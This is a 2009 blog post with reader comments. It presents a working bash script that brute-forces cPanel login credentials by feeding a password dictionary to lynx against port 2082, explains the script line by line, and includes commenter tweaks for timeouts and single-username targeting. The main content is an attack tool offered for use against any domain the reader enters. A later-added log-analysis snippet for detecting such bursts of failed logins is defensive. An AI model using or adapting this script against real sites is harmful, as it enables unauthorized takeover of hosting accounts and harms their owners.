Wednesday, January 14, 2009

how to build your own BruteForce tool using linux shell script



Hello, did you ever try to brute force a website login page and couldn't find the right tool?
It always happens, so I will explain how I did it with a Linux shell script.

I wrote a small script to brute force Cpanel accounts:
============================================
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]bsdmail.org
#
# This is a simple script that will brute force Cpanel account
#
# I do not take any responsibility for what you do with this tool
# Hopefully it will make your life easier rather than making other
# peoples lives more difficult!
#############################
#  _____       _____             _   _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | '__| | | |/ _ \/ _` | __| '_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|

#############################

echo ".::Cpanel BruteForcer By Dr.Death::."
echo
echo -n "Enter domain name for the Cpanel account you want bruteforce:
> "
read site

n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));
do

password=`sed -n "$i"p pass_list`

b=`lynx -dump -nolist -auth="$password" ""$site":2082"`

echo trying password $password

if [ ! -z "$b" ]; then

echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit
==========================================

Let's explain what we did:

  • #!/usr/bin/env bash
Executes the script with the bash shell located through "env".

  • read site
Stores the user input in the variable "$site", which will be the website domain name.

  • n=`cat pass_list | wc -l`
Counts the lines in the file "pass_list", which holds the password list, and stores the count in "$n".

  • for (( i=1; i <= $n; i++));
We use the number stored in "$n" as the bound of a for loop. For example, if the file pass_list has 1000 passwords in it, the loop runs 1000 times, to try all the passwords.

  • password=`sed -n "$i"p pass_list`
Here we use "sed", the stream editor, with the "p" command to print one entry from pass_list on each pass through the loop.
For example, in loop number 4 the variable $i has the value 4 and the sed command looks like this:
"sed -n 4p pass_list", which prints the 4th line of the password file pass_list.

  • b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
Here we use "lynx", the Linux command-line browser, as a socket to connect to the target website.
The option "-dump" dumps the output instead of waiting for user action, "-nolist" disables the link list feature in dumps, and "-auth=" sets the authorization ID and password for protected documents.
For example, to access the cPanel account for the website "example.com" with username "user" and password "pass", it looks like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082"

So the password file pass_list should contain the usernames and passwords in this format: "username:password"

  • if [ ! -z "$b" ]; then
Here we use an if statement with the test "! -z", which means that if the value of "$b" is not empty (lynx returned some output), we are logged in, the password is the value of the variable "$password" in the current loop iteration, and the script exits successfully; otherwise the loop continues.

That's all folks :)
Dr.Death
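
Seen from the server side, the loop described above produces a run of 401 responses from a single client, one per line of pass_list. The following is an added example, not part of the original post, that flags that pattern in an access log; the log format (common log format), the sample lines and the threshold are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): report clients whose requests
# match the dictionary loop above, i.e. a burst of HTTP 401 responses.
# Assumptions: access log in common log format; threshold chosen for the demo.

THRESHOLD=5   # assumed: 401s from one client within one minute

# Constructed sample log lines (documentation IP ranges, made-up times).
sample_log() {
cat <<'EOF'
192.0.2.10 - user [14/Jan/2009:09:30:00 +0000] "GET / HTTP/1.0" 401 381
192.0.2.10 - user [14/Jan/2009:09:30:20 +0000] "GET / HTTP/1.0" 200 5120
203.0.113.7 - user [14/Jan/2009:10:00:01 +0000] "GET / HTTP/1.0" 401 381
203.0.113.7 - user [14/Jan/2009:10:00:02 +0000] "GET / HTTP/1.0" 401 381
203.0.113.7 - user [14/Jan/2009:10:00:03 +0000] "GET / HTTP/1.0" 401 381
203.0.113.7 - user [14/Jan/2009:10:00:04 +0000] "GET / HTTP/1.0" 401 381
203.0.113.7 - user [14/Jan/2009:10:00:05 +0000] "GET / HTTP/1.0" 401 381
203.0.113.7 - user [14/Jan/2009:10:00:06 +0000] "GET / HTTP/1.0" 401 381
203.0.113.7 - user [14/Jan/2009:10:00:07 +0000] "GET / HTTP/1.0" 200 5120
198.51.100.20 - user [14/Jan/2009:11:15:10 +0000] "GET / HTTP/1.0" 401 381
198.51.100.20 - user [14/Jan/2009:11:15:11 +0000] "GET / HTTP/1.0" 401 381
198.51.100.20 - user [14/Jan/2009:11:15:12 +0000] "GET / HTTP/1.0" 401 381
198.51.100.20 - user [14/Jan/2009:11:15:13 +0000] "GET / HTTP/1.0" 401 381
198.51.100.20 - user [14/Jan/2009:11:15:14 +0000] "GET / HTTP/1.0" 401 381
EOF
}

# Reads log lines on stdin; prints "<ip> <peak 401s in one minute> <verdict>".
detect_bruteforce() {
  awk -v t="$THRESHOLD" '
    { ip = $1; minute = substr($4, 2, 17) }        # e.g. 14/Jan/2009:10:00
    $9 == 401 { n = ++fail[ip, minute]; if (n > peak[ip]) peak[ip] = n; next }
    # A 2xx response after a burst may mean one of the guesses was accepted.
    $9 ~ /^2/ && (ip in peak) && peak[ip] >= t { hit[ip] = 1 }
    END {
      for (ip in peak) if (peak[ip] >= t)
        print ip, peak[ip], ((ip in hit) ? "SUCCESS_AFTER_FAILURES" : "FAILED_ONLY")
    }' | sort
}

sample_log | detect_bruteforce
```

The single mistyped login from 192.0.2.10 stays below the threshold and is not reported. Fixed one-minute buckets undercount a burst that straddles a minute boundary, so a production rule would use a sliding window.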

8 comments:

  1. Is there any way to use it in Windows?!! I don't know how, I mean the bash script!

  2. Hello, yes, you can run it with Cygwin Unix under Windows.

  3. I tried it, nice script, but for some reason lynx couldn't connect.

  4. Hi, first try to connect to the target website using lynx to troubleshoot:

    lynx "website.com"
    lynx "website.com:2082"

    Check, maybe the website doesn't run cPanel on it.

  5. Hey, how to run it in Windows 7?

  6. What file extension should I use?

  7. Great, thanks. Really useful. I added the -read_timeout=30 parameter to the lynx command because I was getting stuck at try ~400.

    The command ends up like this:
    b=`lynx -dump -nolist -read_timeout=30 -auth="$password" ""$site":80"`

  8. How can I edit this code if I have the username and I just want to brute the pass for that username?
